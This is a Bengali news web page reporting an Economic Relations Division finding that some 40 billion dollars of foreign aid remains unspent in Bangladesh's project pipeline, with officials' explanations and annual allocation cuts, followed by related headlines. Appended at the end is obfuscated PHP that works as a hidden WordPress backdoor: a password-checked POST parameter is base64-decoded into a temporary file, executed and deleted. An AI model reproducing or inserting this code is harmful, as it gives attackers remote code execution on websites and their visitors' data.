শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ইআরডির প্রতিবেদন, খরচ করতে না পারায় পাইপলাইনে আটকে ৪ হাজার কোটি ডলার

news-image

অর্থনৈতিক সম্পর্ক বিভাগের (ইআরডি) সাম্প্রতিক এক প্রতিবেদনে প্রকাশ করা হয়েছে গত মার্চ মাস পর্যন্ত মন্ত্রণালয় ও বিভাগগুলো অর্থ খরচ করতে না পারায় পাইপলাইনে আটকে আছে চার হাজার কোটি ডলার। যা বাংলাদেশি মুদ্রায় (প্রতি ডলার ৮০ টাকা ধরে) তিন লাখ ২০ হাজার কোটি টাকা। এ বিষয়ে জানতে চাইলে অর্থনৈতিক সম্পর্ক বিভাগের সচিব কাজী শফিকুল আযম বলেন, পাইপলাইন থাকবেই। পাইপলাইনে টাকা না থাকলে প্রকল্প বাস্তবায়ন করা হবে কীভাবে?- সারাবাংলা

তিনি জানান, রূপপুর পারমাণবিক বিদ্যুৎ কেন্দ্রের জন্য একবারেই ১১ বিলিয়ন ডলার এবং চীনের সঙ্গে পুরো প্রকল্পের টাকারই এক সঙ্গে চুক্তি হয়েছে। কিন্তু এসব প্রকল্প তো বাস্তবায়ন হবে ৫ থেকে ৬ বছরে। তাছাড়া, বৈদেশিক অর্থ ব্যয়ের অবস্থা এখন সব চেয়ে ভালো। চলতি অর্থবছরের ১০ মাসে বৈদেশিক অর্থ ছাড় সরকারি তহবিলের অর্থ ব্যয়ের চেয়ে বেশি হয়েছে। গত ১০ মাসে বৈদেশিক অর্থছাড় হয়েছে ৪ দশমিক ৩ বিলিয়ন ডলার, যা গত অর্থবছরের পুরো সময় জুড়েই ছাড় হয়েছিল ৩ দশমিক ৬ বিলিয়ন ডলার। চীন, ভারত ও আইডিবির অর্থছাড়ের অবস্থা খারাপ। কিন্তু বিশ্বব্যাংক, এডিবি, জাইকাসহ অন্যান্য উন্নয়ন সহযোগীদের অবস্থা ভালো।

প্রতিবেদনে বলা হয়েছে, চলতি অর্থবছরের শুরুতে অর্থাৎ ২০১৭ সালের ১ জুলাই পর্যন্ত পাইপলাইনে জমা ছিল ৩ হাজার ৫৭৪ কোটি ডলার। এছাড়া, ঋণের স্থিতি (চলমান ঋণ) ছিল ২০১৭ সালের ৩০ জুন পর্যন্ত ২ হাজার ৮৩৩ কোটি ডলার। এটি গত মার্চ মার্চে এসে বেড়ে দাঁড়িয়েছে ৩ হাজার ১১৮ কোটি মার্কিন ডলারে। সাধারণ অর্থনীতি বিভাগের সদস্য (সিনিয়র সচিব) ড. শামসুল আলম বলেন, বৈদেশিক সহায়তার পাইপলাইন দীর্ঘ হচ্ছে। প্রকল্প বাস্তবায়নে ঋণের টাকার ব্যবহার বাড়াতে একটি টাস্কফোর্স গঠন করা উচিত। অর্থমন্ত্রীর নেতৃত্বে এতে পরিকল্পনা মন্ত্রণালয়সহ বেশি বরাদ্দ পাওয়া মন্ত্রণালয়গুলোকে যুক্ত করা যেতে পারে।

ইআরডির দায়িত্বশীল একাধিক কর্মকর্তা জানান, বৈদেশিক অর্থ ব্যয় করতে না পারা এবং পাইপলাইন জমার প্রধান কারণগুলো হচ্ছে, দাতাদের আমলাতান্ত্রিকতা, বৈদেশিক ঋণের অর্থ খরচ করতে গিয়ে নানা প্রক্রিয়া সমাপ্ত করা, দুর্নীতির সুযোগ কম থাকা, ব্যাপক তদারকি, ধাপে ধাপে স্বচ্ছতা ও জবাবদিহিতা, প্রকল্প পরিচালকদের অদক্ষতা, ইংরেজি ভাষায় পশ্চাৎপদতা এবং সক্ষমতার অভাব ইত্যাদি। এ বিষয়ে বিশ্বব্যাংকের লিড ইকনোমিস্ট ড. জাহিদ হোসেন বলেন, ‘তাড়াহুড়ো কিংবা শর্ট কাট প্রক্রিয়ায় বৈদেশিক সহায়তার অর্থ ব্যয়ের সুযোগ নেই। নিয়মকে পাশ কাটিয়ে কেউ এ অর্থ খরচ করতে পারবেন না। অর্থছাড়ের ক্ষেত্রে অনেকগুলো প্রক্রিয়া পার করতে হয়। অর্থাৎ সরকার ও উন্নয়নসহযোগী দুপক্ষের অনেকগুলো শর্ত থাকে। এ সব শর্ত পূরণ করেই অর্থ পেতে হয়।’

প্রতিবেদনে বলা হয়েছে, চলতি অর্থবছরের বার্ষিক উন্নয়ন কর্মসূচীতে (এডিপি) বৈদেশিক সহায়তা বরাদ্দ ছিল ৫৭ হাজার কোটি টাকা। কিন্তু খরচ করতে না পারায় চার হাজার ৯৫০ কোটি টাকা বাদ দিয়ে সংশোধিত এডিপিতে বরাদ্দ দেওয়া হয় ৫২ হাজার ৫০ কোটি টাকা। এছাড়া গত ২০১৬-১৭ অর্থবছরের এডিপিতে বৈদেশিক সহায়তা বরাদ্দ ছিল ৪০ হাজার কোটি টাকা। সেখান থেকে সাত হাজার কোটি টাকা ফেরত দেয় মন্ত্রণালয় ও বিভাগগুলো। ফলে সংশোধিত এডিপিতে বরাদ্দ দেওয়া হয় ৩৩ হাজার কোটি টাকা। ২০১৫-১৬ অর্থবছরে বৈদেশিক সহায়তা বরাদ্দ ছিল ৩৪ হাজার ৫০০ কোটি টাকা। সেখান থেকে পাঁচ হাজার ৩৪০ কোটি টাকা খরচ করতে না পারায় বরাদ্দ কমিয়ে সংশোধিত এডিপিতে বরাদ্দ দেওয়া হয় ২৯ হাজার ১৬০ কোটি টাকা। তার আগে ২০১৪-১৫ অর্থবছরের এডিপিতে বরাদ্দ ছিল ২৭ হাজার ৭০০ কোটি টাকা। সেখান থেকে দুই হাজার ৮০০ কোটি টাকা কমিয়ে সংশোধিত বরাদ্দ দেওয়া হয় ২৪ হাজার ৯০০ কোটি টাকা। ২০১৩-১৪ অর্থবছরে বরাদ্দ ছিল ২৪ হাজার ৫৬৩ কোটি টাকা। সেখান থেকে তিন হাজার ৩৬৩ কোটি টাকা কমিয়ে সংশোধিত বরাদ্দ দেয়া হয় ২১ হাজার ২০০ কোটি টাকা।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}